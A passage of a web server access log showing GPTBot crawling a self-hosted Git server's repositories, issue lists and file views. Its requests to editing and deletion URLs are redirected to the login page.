+0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:18:00:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 13201] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" +[17/Feb/2026:18:00:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/honeywell-logo.svg?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:18:00:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/favicon.ico?display=rendered" [Client 74.7.227.38] [Length 10885] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/favicon.ico" +[17/Feb/2026:18:00:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 10681] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:18:00:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:18:00:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4846] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:18:00:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:18:00:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:18:00:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 277] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:18:00:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:18:00:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4846] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:18:00:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:18:00:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4846] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:18:00:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 9833] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:18:00:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/honeywell-logo.svg?display=source" [Client 74.7.227.38] [Length 13959] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:18:00:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:18:00:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:18:00:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:18:00:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:18:00:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 959] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:18:00:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:18:00:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:18:00:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:18:00:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:18:00:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 2086] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:18:00:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png" +[17/Feb/2026:18:00:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png?display=rendered" [Client 74.7.227.38] [Length 10903] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png" +[17/Feb/2026:18:00:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:18:00:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11017] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:18:00:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11015] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:18:00:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11017] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:18:00:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/codec.cpp?display=source" [Client 74.7.227.38] [Length 14208] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/codec.cpp" +[17/Feb/2026:18:00:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 10996] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/dummy.cpp" +[17/Feb/2026:18:00:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11160] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/dummy.cpp" +[17/Feb/2026:18:00:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/codec.cpp?display=rendered" [Client 74.7.227.38] [Length 10997] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/codec.cpp" +[17/Feb/2026:18:00:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10140] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&state=open&type=all" +[17/Feb/2026:18:00:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&state=all&type=all" [Client 74.7.227.38] [Length 9933] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:18:00:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&state=open&type=all" [Client 74.7.227.38] [Length 9947] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" +[17/Feb/2026:18:00:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10116] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" +[17/Feb/2026:18:00:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 9968] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:18:01:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:18:01:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:18:01:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:18:01:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:18:01:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:18:01:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresWatchdog/.vscode/tasks.json" +[17/Feb/2026:18:01:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresWatchdog/.vscode/tasks.json" +[17/Feb/2026:18:01:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h?display=rendered" [Client 74.7.227.38] [Length 11103] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:18:01:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9951] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&state=all&type=all" +[17/Feb/2026:18:01:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h?display=source" [Client 74.7.227.38] [Length 15786] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:18:01:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h?display=rendered" [Client 74.7.227.38] [Length 11071] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:18:01:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h?display=source" [Client 74.7.227.38] [Length 15754] [Gzip 5.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:18:01:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" [Client 74.7.227.38] [Length 11036] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" +[17/Feb/2026:18:01:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 9845] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" +[17/Feb/2026:18:01:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/logger.hpp?display=rendered" [Client 74.7.227.38] [Length 11079] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:18:01:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/lib64?display=rendered" [Client 74.7.227.38] [Length 11195] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:18:01:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 